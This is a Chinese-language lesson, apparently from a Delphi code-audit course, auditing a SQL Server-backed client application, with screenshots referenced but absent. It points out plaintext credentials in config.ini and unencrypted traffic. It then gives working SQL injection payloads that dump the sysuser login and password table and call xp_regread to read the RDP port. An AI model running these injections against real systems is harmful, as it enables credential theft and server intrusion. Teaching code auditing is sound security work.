第三课：Delphi代码审计--项目实战1

1、Function & Procedure

Delphi 把操作数据的方法分成了两种，一种是 function，另一种是 procedure，大致理解为“函数”和“过程”。 Procedure 类似 C 语言中的无返回值函数，即 VOID。而 Function 就是 C 语言中的有返回值函数，即没有 Void。

2、连接数据库

程序分为两种连接数据库模式：

无论是本地模式，还是联网模式，都是读取，当前路径的 config.ini 配置文件：

（导致敏感信息暴漏，可直连服务器）

继续跟数据库连接：配合SQL Server数据库，直接带入，可以判断出为明文存储。

3、config.ini

config.ini 配置如下：

4、C/S 交互过程

基于TCP通信，SQL Server通信构架大致如下：

（可导致通信过程中抓取明文执行）

5、SQL 注入

代入执行：（导致可拼接sql语句，查询任意语句或者执行命令）

部分语句其中如下：

select distinct memberid,receivecompany
from weigh where receivecompany is not null and receivecompany like ''%'+xxxxxx+'%''

6、Client

软件呈现如下：

7、构造 SQL 语句

对应收货单位编号，以及收货单位名称。分别为：memberid, receivecompany。闭合语句为：

2' ; select loginid as memberid , password as receivecompany from sysuser --

抓取返回如图：

• 得到admin 账号以及密码。

• 构造读取远程桌面端口号：得到远程服务器端口号

2' ; EXEC master..xp_regread 'HKEY_LOCAL_MACHINE',
'SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp',
'PortNumber' --

8、获取缓冲区内容

copy 获取缓冲区内容： （导致可从服务器端构造代码）

copy 用法如下：

copy（a,b,c); a：就是copy源，就是一个字符串，表示你将要从a里copy一些东西; b：从a中的第b位开始copy（包含第11位）; c：copy从第b位开始后的c个字符， exp： m:=‘the test fuck' s：=copy（m,2,2）； //s值为‘he’

当超出范围，会发生异常错误。实例中，从服务器数据库获取数据后进行 copy。

软件登陆部分代码如下：（导致可自动化跑 loginid。）

多次尝试错误处理如下：退出软件，并且重新开始计算。

--By Micropoor